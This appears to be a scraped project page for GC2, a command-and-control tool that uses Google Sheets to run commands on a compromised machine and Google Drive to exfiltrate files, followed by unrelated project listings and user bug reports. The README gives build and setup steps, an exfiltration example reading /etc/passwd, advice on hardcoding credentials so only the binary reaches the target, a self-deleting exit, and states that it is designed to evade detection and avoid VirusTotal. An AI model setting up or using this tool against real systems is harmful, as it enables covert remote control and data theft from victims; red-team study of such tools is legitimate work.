GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.

Overview

GC2

Logo

GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrates data using Google Drive.

Why

This program has been developed in order to provide a command and control that does not require any particular set up (like: a custom domain, VPS, CDN, ...) during Red Teaming activities.

Furthermore, the program will interact only with Google's domains (*.google.com) to make detection more difficult.

PS: Please don't upload the compiled binary on VirusTotal :)

Set up

  1. Build executable

    git clone https://github.com/looCiprian/GC2-sheet
    cd GC2-sheet
    go build gc2-sheet.go
  2. Create a new google "service account"

    Create a new google "service account" using https://console.cloud.google.com/, create a .json key file for the service account

  3. Enable Google Sheet API and Google Drive API

    Enable Google Drive API https://developers.google.com/drive/api/v3/enable-drive-api and Google Sheet API https://developers.google.com/sheets/api/quickstart/go

  4. Set up Google Sheet and Google Drive

    Create a new Google Sheet and add the service account to the editor group of the spreadsheet (to add the service account use its email)

    Sheet Permission

    Create a new Google Drive folder and add the service account to the editor group of the folder (to add the service account use its email)

    Sheet Permission

  5. Start the C2

    gc2-sheet --key 
         
           --sheet 
          
            --drive 
           
    
           
          
         

    PS: you can also hardcode the parameters in the code, so you will upload only the executable on the target machine (look at comments in root.go and authentication.go)

Features

  • Command execution using Google Sheet as a console
  • Download files on the target using Google Drive
  • Data exfiltration using Google Drive
  • Exit

Command execution

The program will perform a request to the spreedsheet every 5 sec to check if there are some new commands. Commands must be inserted in the column "A", and the output will be printed in the column "B".

Data exfiltration file

Special commands are reserved to perform the upload and download to the target machine

From Target to Google Drive
upload;
   
    
Example:
upload;/etc/passwd

   

Download file

Special commands are reserved to perform the upload and download to the target machine

From Google Drive to Target
download;
   
    ;
    
     
Example:
download;
     
      ;/home/user/downloaded.txt

     
    
   

Exit

By sending the command exit, the program will delete itself from the target and kill its process

PS: From os documentation: If a symlink was used to start the process, depending on the operating system, the result might be the symlink or the path it pointed to. In this case the symlink is deleted.

WorkFlow

Work Flow

Demo

Demo

Disclaimer

The owner of this project is not responsible for any illegal usage of this program.

Support the project

Pull request or paypal

You might also like...
Brigodier is a command parser & dispatcher, designed and developed for command lines such as for Discord bots or Minecraft chat commands. It is a complete port from Mojang's "brigadier" into Go.

brigodier Brigodier is a command parser & dispatcher, designed and developed to provide a simple and flexible command framework. It can be used in man

Command line tool to copy images from a camera SD card to your hard drive

Command line tool to copy images from a camera SD card to your hard drive

A CLI application that allows you to run a complete ToDo app from your terminal application

todo-cli This is a CLI application that allows you to run a complete ToDo app from your terminal application. As a user you can: Create a list of todo

The Keel CLI allows you to setup Keel on your local dev machine or on a Kubernetes cluster
The Keel CLI allows you to setup Keel on your local dev machine or on a Kubernetes cluster

keel-cli What is keel-cli The Keel CLI allows you to setup Keel on your local dev machine or on a Kubernetes cluster, launches and manages Keel instan

The Dapr CLI allows you to setup Dapr on your local dev machine or on a Kubernetes cluster

Dapr CLI The Dapr CLI allows you to setup Dapr on your local dev machine or on a

Allows you to use the magic remote on your webOS LG TV as a keyboard/mouse for your Linux machine

magic4linux Allows you to use the magic remote on your webOS LG TV as a keyboard/mouse for your PC Linux machine. This is a Linux implementation of th

Hasura-fzf - This command has a fzf-like UI that allows you to find and run the file version used by the hasura command

hasura-fzf This command has a fzf-like UI that allows you to find and run the fi

Envp - ENVP is cli wrapper that sets environment variables by profile when you execute the command line

ENVP ENVP is cli wrapper that sets environment variables by profile based config

Integrated console application library, using Go structs as commands, with menus, completions, hints, history, Vim mode, $EDITOR usage, and more ...
Integrated console application library, using Go structs as commands, with menus, completions, hints, history, Vim mode, $EDITOR usage, and more ...

Gonsole - Integrated Console Application library This package rests on a readline console library, (giving advanced completion, hint, input and histor

Comments
  • Download function is unavailable

    Download function is unavailable

    The download function cannot be used. If you use the download function to download a file, you will report googleapi: error 403: only files with binary content can be downloaded Use Export with Docs Editors files., Filenotdownloadable error

    bug 
    opened by Lynx-777 8
  • issue in root.go file

    issue in root.go file

    Hello plz check the following screenshot when i uncommenting the configuration.SetOptions(,,)...i am getting error "expected operand, found <"...plz check the screenshot also as

    question 
    opened by machine1337 5
  • too many error

    too many error

    Hi ,

    Got this error when I try to build with golang on debian 10 : /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:22:24: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:383:26: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:425:24: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:437:27: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:475:25: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:486:20: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:501:38: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:529:21: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:566:28: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:591:29: undefined: io.StringWriter

    Any suggestion ? Thanks

    opened by WTF3 2
  •  BUG appears when I perform the last step,Is there a problem with the source code ?

    BUG appears when I perform the last step,Is there a problem with the source code ?

    panic: runtime error: invalid memory address or nil pointer dereference [signal 0xc0000005 code=0x0 addr=0x20 pc=0xd9640d]

    goroutine 39 [running]: GC2-sheet/internal/C2.readSheet(0xc000151ad0, 0xc000108600) D:/1REDTOOLS/C2/GC2-sheet/internal/C2/read.go:31 +0x1ed GC2-sheet/internal/C2.Run.func1() D:/1REDTOOLS/C2/GC2-sheet/internal/C2/c2.go:70 +0xa6 created by GC2-sheet/internal/C2.Run D:/1REDTOOLS/C2/GC2-sheet/internal/C2/c2.go:59 +0x267

    bug 
    opened by Ron-zs 1
Owner
Lorenzo Grazian
Penetration tester and enthusiast developer. OSCP|OSWE|GPEN|eMAPT|AWS|GCPN
Lorenzo Grazian
painless task queue manager for shell commands with an intuitive cli interface (execute shell commands in distributed cloud-native queue manager).

EXEQ DOCS STILL IN PROGRESS. Execute shell commands in queues via cli or http interface. Features Simple intuitive tiny cli app. Modular queue backend

Mohammed Al Ashaal 12 Jan 29, 2022
Slack remote terminal - execute commands on remote host using slack slash command

slackRT Slack remote terminal - execute commands on remote host using slack slash command Installation Go to api.slack.com/apps and sign in and create

null 2 Jul 12, 2022
A small CLI tool to check connection from a local machine to a remote target in various protocols.

CHK chk is a small CLI tool to check connection from a local machine to a remote target in various protocols.

null 26 Oct 10, 2022
Go Library to Execute Commands Over SSH at Scale

Go library to handle tens of thousands SSH connections and execute the command(s) with higher-level API for building network device / server automation.

Yahoo 874 Nov 24, 2022
A CLI to execute AT Commands via serial port connections.

AT Command CLI A CLI to execute AT Commands via serial port connections. Development Install Go Run go run main.go

Daniel Khaapamyaki 30 Nov 15, 2022
Rafael Mateus 2 Aug 5, 2022
A Target Tracking , NoteTaking , CheckLists and Data Management GUI App for Bug Hunter's and Pentesters.

Screenshots Features • Installation • Usage • Features • Notes • Sandman A Target Tracking , NoteTaking , CheckLists and Data Management GUI App for B

Tarun Koyalwar 28 Nov 22, 2022
Fetches the output for an AWS SSM command for every target

AWSCommander Fetches the output for an AWS SSM command for every target. Optionally outputs as HTML. Examples Get command from Tokio Japan as text AWS

Michael Bradley 0 Nov 24, 2021
A command line tool that builds and (re)starts your web application everytime you save a Go or template fileA command line tool that builds and (re)starts your web application everytime you save a Go or template file

# Fresh Fresh is a command line tool that builds and (re)starts your web application everytime you save a Go or template file. If the web framework yo

null 0 Nov 22, 2021
This is a command line application to manage and fine-tune Time Machine exclude paths.

heptapod This is a command line application to manage and fine-tune Time Machine exclude paths. This repository is a WIP! The advertised functionality

Gergő Törcsvári 20 Nov 10, 2022